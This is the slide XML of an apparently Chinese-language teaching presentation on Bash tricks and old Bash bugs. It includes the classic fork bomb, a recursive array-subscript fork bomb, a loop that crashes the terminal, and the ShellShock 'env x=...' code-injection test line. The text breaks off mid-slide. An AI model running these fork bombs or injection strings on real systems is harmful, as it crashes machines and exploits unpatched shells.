            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>终端下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>GUI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dialog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--title “Check me” --checklist “Pick Numbers” 15 25 3 1 “one” “off” 2 “two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on” 3 “three” “off”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49"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89" t="13468" r="5913" b="3171"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="2276872"/>
            <a:ext cx="8208912" cy="4104456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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18888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Funny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Kill </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>终端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4221088"/>
            <a:ext cx="8229600" cy="2088232"/>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altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for </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 in {-100..-1}; do </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>one;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>因为引用了未知变量，导致了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Segmentation fault (core dumped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>所以在交互终端上运行导致终端异常退出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49"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250"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="459110" y="2852936"/>
            <a:ext cx="8217346" cy="1152128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
          <a:extLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459110" y="1196752"/>
            <a:ext cx="8217346" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>间接引用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	a=“hello world”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	b=a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	echo “${!b}” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183593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Bash Bugs (BASH_VERSION &lt; 4.3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569764" y="1700808"/>
            <a:ext cx="8229600" cy="612068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>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Font typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Fork Bomb (Fork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>炸弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569764" y="3843330"/>
            <a:ext cx="8229600" cy="6657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Font typeface="Wingdings 3"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShellShock (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>破壳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569764" y="4653136"/>
            <a:ext cx="8229600" cy="980967"/>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altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>env x=‘() { :; }; echo vulnerable’ bash –c “echo this is a test”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569764" y="2492896"/>
            <a:ext cx="8229600" cy="8925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600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unset –v dev;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dev[${dev=‘dev[1&gt;(${dev[dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]})]’}]};</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218414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Bash Bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-- Fork Bomb</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460455" y="5013176"/>
            <a:ext cx="8229600" cy="999768"/>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altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unset dev; ${dev[${dev=‘dev[0]’}]} </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unset dev ;${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dev[${dev=‘dev[1&gt;(${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dev[dev]})]’}]}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49"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481143" y="4008108"/>
            <a:ext cx="8208912" cy="627740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
          <a:extLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481280" y="1196752"/>
            <a:ext cx="8195175"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dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Fork Bomb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	: () { :|:; }; :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481280" y="2348880"/>
            <a:ext cx="8195176"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latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>数组下标出现递归且允许使用进程替换</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a[0]=a; a[a]=a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash: a: expression recursion level exceeded (error token is "a")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230026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Bash Bugs -- ShellShock</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="1705744"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShellShock  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>弹震症</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>严重性评级 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>代码注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>env x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=‘() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ :;}; echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vulnerable’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
